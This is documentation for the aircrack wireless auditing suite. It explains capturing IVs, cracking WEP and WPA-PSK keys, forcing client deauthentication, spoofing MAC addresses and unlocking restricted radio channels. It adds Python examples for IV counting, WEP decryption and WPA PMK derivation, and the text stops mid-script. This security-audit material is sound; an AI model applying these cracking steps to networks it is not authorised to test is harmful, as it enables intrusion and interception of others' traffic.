-------------------------------------------------------------------------------

                            aircrack documentation                             

-------------------------------------------------------------------------------

What is aircrack ?

    aircrack is a set of tools for auditing wireless networks:
   
      + airodump: 802.11 packet capture program
      + aireplay: 802.11 packet injection program
      + aircrack: static WEP and WPA-PSK key cracker
      + airdecap: decrypts WEP/WPA capture files

Where to download aircrack ?

    The official download location is http://www.cr0.net:8040/code/network/.
    However, if you can't access port 8040 for some reason, you may use this
    mirror instead: http://100h.org/wlan/aircrack/.
   
    Also check this WEP cracking video, and this other WPA cracking video
    (flash required).

Is there an aircrack discussion forum ?

    There is no aircrack mailing list, however you can post your bug reports
    and feature requests on the netstumbler Linux forum, which I read quite
    regularly.

What is the song in that WEP cracking video ?

    The name of the song is Moskau, performed by Dschinghis Khan.

How do I crack a static WEP key ?

    The basic idea is to capture as much encrypted traffic as possible using
    airodump. Each WEP data packet has an associated 3-byte Initialization
    Vector (IV): after a sufficient number of data packets have been collected,
    run aircrack on the resulting capture file. aircrack will then perform a
    set of statistical attacks developed by a talented hacker named KoreK.

How many IVs are required to crack WEP ?

    WEP cracking is not an exact science. The number of required IVs depends on
    the WEP key length, and it also depends on your luck. Usually, 40-bit WEP
    can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with
    1.000.000 IVs; if you're out of luck you may need two million IVs, or more.
   
    There's no way to know the WEP key length: this information is kept hidden
    and never announced, either in management or data packets; as a
    consequence, airodump cannot report the WEP key length. Thus, it is
    recommended to run aircrack twice: when you have 250.000 IVs, start
    aircrack with "-n 64" to crack 40-bit WEP. Then if the key isn't found,
    restart aircrack (without the -n option) to crack 104-bit WEP.

I can't seem to capture any IVs !

    Possible reasons:
   
      + You are standing too far from the access point.
      + There is no traffic on the target wireless network.
      + There is some G traffic but you're capturing in B mode.
      + Something is wrong with your card (firmware problem ?)
   
    By the way, beacons are just unencrypted announcement packets. They're
    totally useless for WEP cracking.
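
    The two points above (every WEP data packet carries a 3-byte IV in the
    clear; beacons and other management frames carry none) can be checked
    directly on a capture file. The following Python script is an added
    example, not part of aircrack, and it is written from the auditor's side:
    it reads a classic pcap file with raw 802.11 frames (link type 105, which
    is what airodump writes), counts the WEP IVs per BSSID and flags IVs that
    were used more than once, since a repeated IV means a repeated RC4
    keystream. The capture it parses is constructed inline; the BSSID and
    station address are the ones from the airodump screenshot later in this
    document, and the frame bodies are dummy bytes.

```python
import struct

LINKTYPE_IEEE802_11 = 105  # pcap link type for raw 802.11 frames (what airodump writes)


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def fmt_mac(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def dot11_frame(fc0: int, fc1: int, a1: bytes, a2: bytes, a3: bytes, body: bytes) -> bytes:
    """Three-address 802.11 frame: frame control, duration, addr1..3, sequence control, body."""
    return struct.pack("<BBH", fc0, fc1, 0) + a1 + a2 + a3 + struct.pack("<H", 0) + body


def build_sample_pcap() -> bytes:
    """Constructed capture (not a real one): a beacon, three WEP data frames, one TKIP
    frame and one plaintext data frame, for the AP/station shown in the screenshot."""
    ap, sta = mac("00:13:10:30:24:9C"), mac("00:09:5B:EB:C5:2B")
    bcast = b"\xff" * 6

    def wep_body(iv: bytes) -> bytes:          # IV | key-id byte | dummy ciphertext | dummy ICV
        return iv + b"\x00" + b"\xaa" * 20 + b"\x00" * 4

    frames = [
        dot11_frame(0x80, 0x00, bcast, ap, ap, b"\x00" * 12 + b"\x00\x04myap"),  # beacon: no IV
        dot11_frame(0x08, 0x42, sta, ap, ap, wep_body(b"\x12\x34\x56")),   # AP -> STA (FromDS), WEP
        dot11_frame(0x08, 0x42, sta, ap, ap, wep_body(b"\x12\x34\x57")),
        dot11_frame(0x08, 0x41, ap, sta, ap, wep_body(b"\x12\x34\x56")),   # STA -> AP (ToDS), reused IV
        dot11_frame(0x08, 0x42, sta, ap, ap, b"\x00\x00\x00\x20" + b"\xbb" * 24),  # ExtIV bit: TKIP
        dot11_frame(0x08, 0x02, sta, ap, ap, b"\xaa\xaa\x03" + b"\x00" * 10),       # unencrypted data
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_pcap(data: bytes):
    """Yield each packet's bytes from a classic pcap file whose link type is raw 802.11."""
    magic = struct.unpack_from("<I", data, 0)[0]
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack_from(endian + "I", data, 20)[0] != LINKTYPE_IEEE802_11:
        raise ValueError("capture does not contain raw 802.11 frames")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def wep_ivs(data: bytes) -> dict:
    """Map BSSID -> list of 3-byte IVs (hex), one entry per WEP-protected data frame."""
    ivs = {}
    for frame in iter_pcap(data):
        if len(frame) < 28:
            continue
        fc0, fc1 = frame[0], frame[1]
        if (fc0 >> 2) & 3 != 2:        # type 2 = data; beacons and other management frames carry no IV
            continue
        if not fc1 & 0x40:             # Protected Frame bit clear: plaintext, nothing to count
            continue
        to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
        if to_ds and from_ds:          # 4-address WDS frames are out of scope here
            continue
        a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
        bssid = a1 if to_ds else (a2 if from_ds else a3)
        if frame[27] & 0x20:           # ExtIV bit set: TKIP/CCMP, not a WEP IV
            continue
        ivs.setdefault(fmt_mac(bssid), []).append(frame[24:27].hex())
    return ivs


def iv_summary(ivs: dict) -> dict:
    """Per BSSID: WEP data frames seen, distinct IVs, and IVs that occurred more than once."""
    summary = {}
    for bssid, seen in ivs.items():
        reused = sorted({iv for iv in seen if seen.count(iv) > 1})
        summary[bssid] = {"frames": len(seen), "unique_ivs": len(set(seen)), "reused": reused}
    return summary


if __name__ == "__main__":
    for bssid, stats in iv_summary(wep_ivs(build_sample_pcap())).items():
        print(bssid, stats)
```

    On the constructed capture the beacon, the TKIP frame and the plaintext
    frame are ignored, three WEP IVs are counted for the AP, and 12:34:56 is
    reported as reused. The same summary run over a real airodump .cap file
    tells you how close a WEP network is to exhausting its 24-bit IV space.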

Why is there no Windows version of aireplay ?

    The PEEK driver doesn't support 802.11 packet injection. In fact, there are
    no windows drivers supporting injection AT ALL. And I am NOT going to write
    one, so don't bother asking me.

It says "cygwin1.dll not found" when I start aircrack.exe

    You can download this library from: http://100h.org/wlan/aircrack/.
   
    To use aircrack, simply drag&drop your .cap or .ivs capture file(s) over
    aircrack.exe. If you want to pass options to the program you'll have to
    start a shell (cmd.exe) and manually type the command line; for example:
   
    C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap
   
    See below for a list of options.

Is my card compatible with airodump / aireplay ?

    First of all, search Google to find which chipset your card has. For
    example, if you have a Linksys WPC54G search for "wpc54g chipset linux".
   
       +-------------------------------------------------------------------+   
       |            |  Supported by  |   Supported by    |  Supported by   |   
       |  Chipset   |  airodump for  |   airodump for    |  aireplay for   |   
       |            |   Windows ?    |      Linux ?      |     Linux ?     |   
       |------------+----------------+-------------------+-----------------|   
       |            | YES (Agere     | YES (patched      | NO (firmware    |   
       | HermesI    | driver)        | orinoco driver)   | corrupts the    |   
       |            |                |                   | MAC header)     |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | YES (HostAP or    | YES (either     |   
       |            | NO, but see    | wlan-ng driver),  | with HostAP or  |   
       | Prism2/3   | LinkFerret for | STA firmware      | wlan-ng, driver |   
       |            | an alternative | 1.5.6 or newer    | patching        |   
       |            |                | required          | required)       |   
       |------------+----------------+-------------------+-----------------|   
       |            | NO, but see    | YES (prism54      | YES (driver     |   
       | PrismGT    | LinkFerret for | driver, FullMAC   | patching        |   
       |            | an alternative | cards only!)      | recommended)    |   
       |            | (FullMAC only) |                   |                 |   
       |------------+----------------+-------------------+-----------------|   
       |            | YES (Atheros   | YES (madwifi      | YES (driver     |   
       | Atheros    | driver)        | driver)           | patching        |   
       |            |                |                   | required)       |   
       |------------+----------------+-------------------+-----------------|   
       |            |                |                   | YES (driver     |   
       |            | YES (Realtek   | YES (             | patching        |   
       | RTL8180    | driver)        | rtl8180-sa2400    | required), but  |   
       |            |                | driver)           | somewhat        |   
       |            |                |                   | unreliable      |   
       |------------+----------------+-------------------+-----------------|   
       |            | YES (Cisco     | YES (airo driver, |                 |   
       | Aironet    | driver)        | firmware 4.25.30  | NO              |   
       |            |                | recommended)      |                 |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | YES (rt2400 /     | YES (rt2500     |   
       | Ralink     | NO             | rt2500 / rt2570   | only, driver    |   
       |            |                | driver)           | patching        |   
       |            |                |                   | required)       |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | PARTIAL: the      |                 |   
       | Centrino b | NO             | ipw2100 driver    | NO              |   
       |            |                | doesn't discard   |                 |   
       |            |                | corrupted packets |                 |   
       |------------+----------------+-------------------+-----------------|   
       | Centrino b | NO             | YES (ipw2200      | NO (firmware    |   
       | /g         |                | driver)           | drops packets)  |   
       |------------+----------------+-------------------+-----------------|   
       | TI (ACX100 | NO             | UNKNOWN (acx100   | NO              |   
       | / ACX111)  |                | driver)           |                 |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | NO (and btw,      |                 |   
       | Broadcom   | NO             | airodump is NOT   | NO              |   
       |            |                | compatible with   |                 |   
       |            |                | ndiswrapper)      |                 |   
       +-------------------------------------------------------------------+   
   
    Some cards are not recognized by the Windows drivers above, even though
    they have the correct chipset. In this case, open the hardware manager,
    select your card, "Update the driver", select "Install from a specific
    location", select "Don't search, I will choose the driver to install",
    click "Have disk", set the path to where the driver has been unzipped,
    uncheck "Show compatible hardware", and finally choose the driver.

I have a Prism2 card, but airodump / aireplay doesn't seem to work !

    This is very likely a firmware problem. Old firmware versions have trouble
    with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so
    make sure yours is up to date -- see below for instructions. The
    recommended station firmware version is 1.7.4. If it doesn't work well
    (kismet or airodump stalls after capturing a couple of packets), try STA
    1.5.6 instead.
   
    Also, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems
    stuck, you will have to reset it.

I have an Atheros card, and the madwifi patch crashes the kernel /
aireplay keeps saying enhanced RTC support isn't available.

    There are quite a few problems with some versions of the Linux 2.6 branch
    (especially before 2.6.11 was released) that will cause a kernel panic when
    injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is
    simply broken. Thus, it is highly recommended to use either Linux 2.6.11.x
    or preferably Linux >= 2.4.31.

How do I update my Prism2 firmware ?

    Make sure you are using patched HostAP (see below for instructions on how
    to patch and install HostAP). Alternatively, you may boot the WHAX Live CD!
    (which already has patched HostAP) and run the switch-to-hostap script.
   
    Now that HostAP is loaded, you can check your firmware's primary and
    station version with this command:
   
    # dmesg | grep wifi
    hostap_cs: Registered netdevice wifi0
    wifi0: NIC: id=0x800c v1.0.0
    wifi0: PRI: id=0x15 v1.1.1  (primary firmware is 1.1.1)
    wifi0: STA: id=0x1f v1.7.4  (station firmware is 1.7.4)
    wifi0: registered netdevice wlan0
   
    If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2
    and MUST use STA firmware version 1.5.6. Otherwise, you should use PRI
    1.1.1 / STA 1.7.4 which is the most stable firmware version for newer
    Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x, people have reported
    having trouble with them.
   
    To update the firmware, you'll need prism2_srec from the hostap-utils
    package; if it's not present on your system, download and compile
    hostap-utils:
   
    wget http://100h.org/wlan/linux/prism2/hostap-utils-0.3.7.tar.gz
    tar -xvzf hostap-utils-0.3.7.tar.gz
    cd hostap-utils-0.3.7
    make
   
    Some Prism2 cards have been restricted to a certain set of channels because
    of country regulation. You can activate all 14 channels with the following
    commands:
   
    ./prism2_srec wlan0 -D > pda; cp pda pda.bak
    Edit pda and put 3FFF at offset 0104 (line 24)
   
    Finally, download the firmware and flash your card. If the NIC id is
    between 0x8002 and 0x8008:
   
    wget http://100h.org/wlan/linux/prism2/sf010506.hex
    ./prism2_srec -v -f wlan0 sf010506.hex -P pda
   
    Otherwise:
   
    wget http://100h.org/wlan/linux/prism2/pk010101.hex
    wget http://100h.org/wlan/linux/prism2/sf010704.hex
    ./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda
   
    If you get the message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not
    supported", the HostAP driver is not loaded and you must install it. If you
    get the message "ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported",
    then your HostAP driver has not been properly patched for non-volatile
    download support.
   
    Another alternative is to upgrade the firmware with WinUpdate; this
    requires the WPC11 driver v2.5 to be installed. See http://100h.org/wlan/
    linux/prism2/.

Which is the best card to buy ?

    My favourite card is the Netgear WAG511, which is Atheros-based and has
    excellent sensitivity (no external antenna connector though); a cheaper
    version is the WG511T (PCMCIA) / WG311T (PCI). Another nice Atheros card is
    the Proxim 8470-WD, this one has an external MC antenna connector. Also,
    the DWL-G650/G650M is quite cheap (either rev. B or C, but do not buy the
    DWL-650+ which has a TI chipset); the PCI equivalent is the DWL-G520
    (likewise, don't buy the G520+).
   
    Ralink makes some nice b/g chipsets, and has been very cooperative with the
    open-source community to release GPL drivers. Injection is now fully
    supported on PCI/PCMCIA RT2500 cards (such as the MSI CB54G2), and should
    hopefully be supported in the future with USB RT2570 adapters.
   
    Do NOT buy anything that might have a PrismGT chipset. Some time ago,
    Conexant decided to stop manufacturing their FullMAC chipset and released
    a cheap, cut-down version known as "SoftMAC", which is totally
    incompatible with the prism54 driver.
   
    Conexant has not been cooperative at all with the prism54 project, so they
    don't deserve any of your money. As a matter of fact, FullMAC cards are not
    being sold anymore -- you'll only find crappy SoftMAC in retail. In
    particular, do not buy the WG511 (v2 / v3), the 3CRWE154G72 (v2 / v3), the
    SMC2835W (v3), the SMC2802W (v2) or the ZyAIR G-300 (v2 / v3).

How do I use airodump for Windows ?

    First of all, make sure that your card is compatible (see table above) and
    that you have installed the proper driver from WildPackets. Also, you must
    download peek.dll and peek5.sys and put them in the same directory as
    airodump.exe.
   
    When running airodump, you should specify:
   
      + The network interface index number, which must be picked in the list
        displayed by airodump.
      + The network interface type ('o' for HermesI and Realtek, 'a' for
        Aironet and Atheros).
      + The channel number, between 1 and 14. You can also specify 0 to hop
        between all channels.
      + The output prefix. For example, if the prefix is "foo", then airodump
        will create foo.cap (captured packets) and foo.txt (CSV statistics). If
        foo.cap already exists, airodump will resume the capture session by
        appending the packets to it.
      + The "only IVs" flag. Specify 1 if you just want to save the IVs from
        WEP data packets. This saves space, but the resulting file (foo.ivs)
        will only be useful for WEP cracking.
   
    To stop capturing packets, simply press Ctrl-C. You may get a blue screen;
    this is due to a bug in the PEEK driver not properly exiting monitor mode.
    Also, the capture file may be empty. The cause of this bug is unknown.

Why can't I compile airodump and aireplay on BSD / Mac OS X ?

    Both airodump and aireplay sources are Linux-specific. There are no plans
    to port them to any other operating system.

How do I use airodump for Linux ?

    Before running airodump, you may start the airmon.sh script to list the
    detected wireless interfaces.
   
      usage: airodump <interface name or pcap filename>
                      <output prefix> <channel> [IVs flag]
   
    The first argument can be an interface name (such as: eth1, ath0, wlan0,
    etc.) in which case airodump will capture packets on this interface. You
    may also specify a pcap filename instead, for example to analyze a previous
    capture.
   
    If you specify the same output prefix, airodump will resume the session and
    append the packets at the end of the existing capture file.
   
    You can hop between channels by specifying 0 as the channel number;
    however, when attacking a WLAN you should instead specify the channel
    number of the target access point. Also, the channel number will be
    ignored if the packet source is a capture file.
   
    You may set the optional IVs flag to only write the captured WEP IVs; this
    will save a lot of space, but the resulting file won't be useful for
    anything other than WEP cracking. If the flag is not set, the whole packets
    are saved.
   
    Also, during the capture airodump updates a plain .txt file with all the
    detected access points and stations.
   
    Some examples:
   
    Channel hopping with HostAP  : airodump wlan0 out 0      
    Capture packets on channel 4 : airodump ath0 test 4      
    Only save IVs on channel 10  : airodump ath0 test 10 1   
    Extract IVs from a pcap file : airodump out.cap small 0 1
   
airodump keeps switching between WEP and WPA.

    This is happening because your driver doesn't properly discard corrupted
    packets (that have an invalid CRC). If it's a Centrino b, it just can't be
    helped; go buy a better card. If it's a Prism2, try upgrading the firmware.

Sometimes airodump hangs for no apparent reason.

    Yep, I'm not sure exactly where this bug comes from; it rarely occurs,
    fortunately.

What's the meaning of the fields displayed by airodump ?

    airodump will display a list of detected access points, and also a list of
    connected clients ("stations"). Here's an example screenshot using a Prism2
    card with HostAP:
   
    +-------------------------------------------------------------------------+
    |  BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID   |
    |                                                                         |
    |  00:13:10:30:24:9C  223     1045              203   6  48  WEP  myap    |
    |                                                                         |
    |  BSSID              STATION            PWR   Packets  ESSID             |
    |                                                                         |
    |  00:13:10:30:24:9C  00:09:5B:EB:C5:2B  203       154  myap              |
    |  00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190        17  myap              |
    +-------------------------------------------------------------------------+
   
       +-------------------------------------------------------------------+   
       |  Field  |                       Description                       |   
       |---------+---------------------------------------------------------|   
       | BSSID   | MAC address of the access point.                        |   
       |---------+---------------------------------------------------------|   
       |         | Signal level reported by the card. Its meaning depends  |   
       | PWR     | on the driver, but as the signal gets higher you get    |   
       |         | closer to the AP or the station. If PWR == -1, the      |   
       |         | driver doesn't support signal level reporting.          |   
       |---------+---------------------------------------------------------|   
       |         | Number of announcement packets sent by the AP. Each     |   
       | Beacons | access point sends about ten beacons per second at the  |   
       |         | lowest rate (1M), so they can usually be picked up from |   
       |         | very far.                                               |   
       |---------+---------------------------------------------------------|   
       | IP / #  | LAN IP address if unencrypted, otherwise the number of  |   
       |  Data   | captured WEP or WPA encrypted data packets (including   |   
       |         | data broadcast packets).                                |   
       |---------+---------------------------------------------------------|   
       |         | Channel number (taken from beacon packets). Note:       |   
       | CH      | sometimes packets from other channels are captured even |   
       |         | if airodump is not hopping, because of radio            |   
       |         | interference.                                           |   
       |---------+---------------------------------------------------------|   
       |         | Maximum speed supported by the AP. If MB = 11, it's     |   
       | MB      | 802.11b, if MB = 22 it's 802.11b+ and higher rates are  |   
       |         | 802.11g.                                                |   
       |---------+---------------------------------------------------------|   
       |         | Encryption algorithm in use. OPN = no encryption, "WEP? |   
       |         | " = WEP or higher (not enough data to choose between    |   
       | ENC     | WEP and WPA), WEP (without the question mark) indicates |   
       |         | static or dynamic WEP, and WPA if TKIP or CCMP is       |   
       |         | present.                                                |   
       |---------+---------------------------------------------------------|   
       |         | The so-called "SSID", which can be empty if SSID hiding |   
       | ESSID   | is activated. In this case, airodump will try to        |   
       |         | recover the SSID from probe responses and association   |   
       |         | requests.                                               |   
       |---------+---------------------------------------------------------|   
       |         | MAC address of each associated station. In the          |   
       | STATION | screenshot above, two clients have been detected (00:   |   
       |         | 09:5B:EB:C5:2B and 00:02:2D:C1:5D:1F).                  |   
       +-------------------------------------------------------------------+   

How do I merge multiple capture files ?

    You may use the mergecap program (part of the ethereal-common package or
    the win32 distribution):
   
    mergecap -w out.cap test1.cap test2.cap test3.cap
   
    As of now, it's not possible to merge .ivs files.

Can I use Ethereal to capture 802.11 packets ?

    Under Linux, simply set up the card in monitor mode with the airmon.sh
    script. Under Windows, Ethereal can NOT capture 802.11 packets.

How do I change my card's MAC address ?

    This operation is only possible under Linux. For example, if you have an
    Atheros card:
   
    ifconfig ath0 down hw ether 00:10:20:30:40:50
    ifconfig ath0 up

How do I use aircrack ?

    Usage: aircrack [options] <capture file(s)>
   
    You can specify multiple input files (either in .cap or .ivs format). Also,
    you can run both airodump and aircrack at the same time: aircrack will
    auto-update when new IVs are available.
   
    Here's a summary of all available options:
   
       +-------------------------------------------------------------------+   
       | Option | Param. |                   Description                   |   
       |--------+--------+-------------------------------------------------|   
       | -a     | amode  | Force attack mode (1 = static WEP, 2 =          |   
       |        |        | WPA-PSK).                                       |   
       |--------+--------+-------------------------------------------------|   
       |        |        | If set, all IVs from networks with the same     |   
       | -e     | essid  | ESSID will be used. This option is also         |   
       |        |        | required for WPA-PSK cracking if the ESSID is   |   
       |        |        | not broadcasted (hidden).                       |   
       |--------+--------+-------------------------------------------------|   
       | -b     | bssid  | Select the target network based on the access   |   
       |        |        | point's MAC address.                            |   
       |--------+--------+-------------------------------------------------|   
       | -p     | nbcpu  | On SMP systems, set this option to the number   |   
       |        |        | of CPUs.                                        |   
       |--------+--------+-------------------------------------------------|   
       | -q     | none   | Enable quiet mode (no status output until the   |   
       |        |        | key is found, or not).                          |   
       |--------+--------+-------------------------------------------------|   
       | -c     | none   | (WEP cracking) Restrict the search space to     |   
       |        |        | alpha-numeric characters only (0x20 - 0x7F).    |   
       |--------+--------+-------------------------------------------------|   
       | -d     | start  | (WEP cracking) Set the beginning of the WEP key |   
       |        |        | (in hex), for debugging purposes.               |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) MAC address to filter WEP data   |   
       | -m     | maddr  | packets. Alternatively, specify -m ff:ff:ff:ff: |   
       |        |        | ff:ff to use every IV, regardless of the        |   
       |        |        | network.                                        |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) Specify the length of the key:   |   
       | -n     | nbits  | 64 for 40-bit WEP, 128 for 104-bit WEP, etc.    |   
       |        |        | The default value is 128.                       |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) Only keep the IVs that have this |   
       | -i     | index  | key index (1 to 4). The default behaviour is to |   
       |        |        | ignore the key index.                           |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) By default, this parameter is    |   
       |        |        | set to 3 for 104-bit WEP and to 6 for 40-bit    |   
       | -f     | fudge  | WEP. Specify a higher value to increase the     |   
       |        |        | bruteforce level: cracking will take more time, |   
       |        |        | but with a higher likelihood of success.        |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) There are 17 korek statistical   |   
       |        |        | attacks. Sometimes one attack creates a huge    |   
       | -k     | korek  | false positive that prevents the key from being |   
       |        |        | found, even with lots of IVs. Try -k 1, -k 2,   |   
       |        |        | ... -k 17 to disable each attack selectively.   |   
       |--------+--------+-------------------------------------------------|   
       | -x     | none   | (WEP cracking) Do not bruteforce the last two   |   
       |        |        | keybytes.                                       |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) This is an experimental single   |   
       | -y     | none   | bruteforce attack which should only be used     |   
       |        |        | when the standard attack mode fails with more   |   
       |        |        | than one million IVs.                           |   
       |--------+--------+-------------------------------------------------|   
       | -w     | words  | (WPA cracking) Path to a wordlist.              |   
       +-------------------------------------------------------------------+   

Could you implement a resume option in aircrack ?

    There are no plans to implement this feature.

How can I crack a WPA-PSK network ?

    You must sniff until a handshake takes place between a wireless client and
    the access point. To force the client to reauthenticate, you can start a
    deauth attack with aireplay. Also, a good dictionary is required; see
    http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
   
    FYI, it's not possible to pre-compute large tables of Pairwise Master Keys
    like rainbowcrack does, since the passphrase is salted with the ESSID.

Will WPA be cracked in the future ?

    It's extremely unlikely that WPA will be cracked just like WEP was. Even
    TKIP provides a high security level, and CCMP is even better. The 4-way
    handshake and encryption protocols are very robust and secure, provided
    that the passphrase was chosen wisely (that is, not in a dictionary ;-).

I have more than one million IVs, but aircrack doesn't find the key !

    Possible reasons:
   
      + Out of luck: you must capture more IVs. Usually, 104-bit WEP can be
        cracked with about one million IVs, but sometimes more IVs are needed.
         
      + If all votes seem equal, or if there are many negative votes, then the
        capture file is corrupted, or the key is not static.
         
      + A false positive prevented the key from being found. Try to disable
        each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the
        experimental single reverse attack (-y).

I've found the key, how do I decrypt a capture file ?

    Simply use the airdecap program:
   
      usage: airdecap [options] <pcap file>
    
          -l       : don't remove the 802.11 header
          -b bssid : access point MAC address filter
          -k pmk   : WPA Pairwise Master Key in hex
          -e essid : target network ascii identifier
          -p pass  : target network WPA passphrase
          -w key   : target network WEP key in hex
    
      examples:
    
      airdecap -b 00:09:5B:10:BC:5A open-network.cap
      airdecap -w 11A3E229084349BC25D97E2939 wep.cap
      airdecap -e my_essid -p my_passphrase tkip.cap
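
    What airdecap does for a static WEP key, written out as an added Python
    example (this is not aircrack's or airdecap's code): WEP seeds RC4 with
    the 3-byte IV followed by the key, and checks a CRC-32 integrity value
    (ICV) appended to the plaintext before accepting a packet. The key is the
    104-bit one from the airdecap example above; the IV and payload are
    constructed, and the little-endian ICV layout is assumed from the 802.11
    wire format.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by the keystream generator (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def check_wep_key(key: bytes) -> None:
    # 5 bytes = 40-bit WEP (aircrack's "-n 64"), 13 bytes = 104-bit WEP ("-n 128")
    if len(key) not in (5, 13):
        raise ValueError("WEP key must be 5 bytes (40-bit) or 13 bytes (104-bit)")


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian (assumed layout)."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body = IV(3) | key-id byte | RC4(IV || key, plaintext || ICV)."""
    check_wep_key(key)
    if len(iv) != 3:
        raise ValueError("WEP IV is exactly 3 bytes")
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext, or None when the ICV does not verify (wrong key or damaged
    frame); this is the check a decryptor such as airdecap performs per packet."""
    check_wep_key(key)
    if len(body) < 8:          # IV + key-id byte + at least the 4-byte ICV
        return None
    iv, ciphertext = body[:3], body[4:]
    decrypted = rc4(iv + key, ciphertext)
    plaintext, tag = decrypted[:-4], decrypted[-4:]
    return plaintext if icv(plaintext) == tag else None


def key_id_of(body: bytes) -> int:
    """Key index (0..3 on the wire; aircrack's -i option numbers them 1 to 4)."""
    return body[3] >> 6


if __name__ == "__main__":
    key = bytes.fromhex("11A3E229084349BC25D97E2939")  # 104-bit key from the airdecap example
    body = wep_encrypt(key, b"\x12\x34\x56", b"\xaa\xaa\x03\x00\x00\x00\x08\x00hello", key_id=1)
    print(body.hex())
    print(wep_decrypt(key, body))        # the LLC/SNAP header plus "hello"
    print(wep_decrypt(bytes(13), body))  # None: wrong key, ICV fails
```

    Note that the IV travels in the clear in front of every packet, which is
    why airodump can collect IVs without knowing the key, and why a 40-bit
    and a 104-bit key produce bodies of identical layout: the key length is
    not visible on the wire, as the FAQ entry on IV counts says.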

How do I recover my WEP key in Windows ?

    You may use the WZCOOK program which recovers WEP keys from XP's Wireless
    Zero Configuration utility. This is experimental software, so it may or may
    not work depending on your service pack level.

Does WZCOOK also recover WPA keys ?

    WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is
    the result of the passphrase hashed 8192 times together with the ESSID and
    the ESSID length. The passphrase itself can't be recovered -- however,
    knowing the PMK is enough to connect to a WPA-protected wireless network
    with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf
    configuration file should look like:
   
    network={
        ssid="my_essid"
        pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
    }
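
    The derivation described above, and the earlier remark that the passphrase
    is salted with the ESSID so that precomputed PMK tables are impractical,
    as an added Python example (not part of aircrack, WZCOOK or
    wpa_supplicant). The PMK is PBKDF2-HMAC-SHA1 over the passphrase with the
    ESSID as salt, 4096 iterations, 32 bytes out; because SHA-1 yields 20
    bytes, two blocks are needed, which is where the 8192 hash operations
    mentioned above come from. The second function writes the derivation out
    by hand and counts the HMAC calls. The test vector (passphrase "password",
    SSID "IEEE") is the published 802.11i one.

```python
import hashlib
import hmac

PBKDF2_ITERATIONS = 4096   # per 802.11i
PMK_LEN = 32               # 256-bit Pairwise Master Key


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes), via hashlib."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def wpa_pmk_by_hand(passphrase: str, essid: str):
    """The same PBKDF2 written out (RFC 2898), returning (pmk, number_of_hmac_calls)."""
    pw, salt = passphrase.encode("utf-8"), essid.encode("utf-8")
    calls, derived = 0, b""
    for block in (1, 2):                       # ceil(32 / 20) = 2 output blocks
        u = hmac.new(pw, salt + block.to_bytes(4, "big"), hashlib.sha1).digest()
        calls += 1
        t = u
        for _ in range(PBKDF2_ITERATIONS - 1):
            u = hmac.new(pw, u, hashlib.sha1).digest()
            calls += 1
            t = bytes(a ^ b for a, b in zip(t, u))   # T_i = U_1 xor U_2 xor ... xor U_c
        derived += t
    return derived[:PMK_LEN], calls


def pmk_depends_on_essid(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True when the same passphrase gives different PMKs under two ESSIDs (the salt effect)."""
    return wpa_pmk(passphrase, essid_a) != wpa_pmk(passphrase, essid_b)


if __name__ == "__main__":
    pmk, calls = wpa_pmk_by_hand("password", "IEEE")
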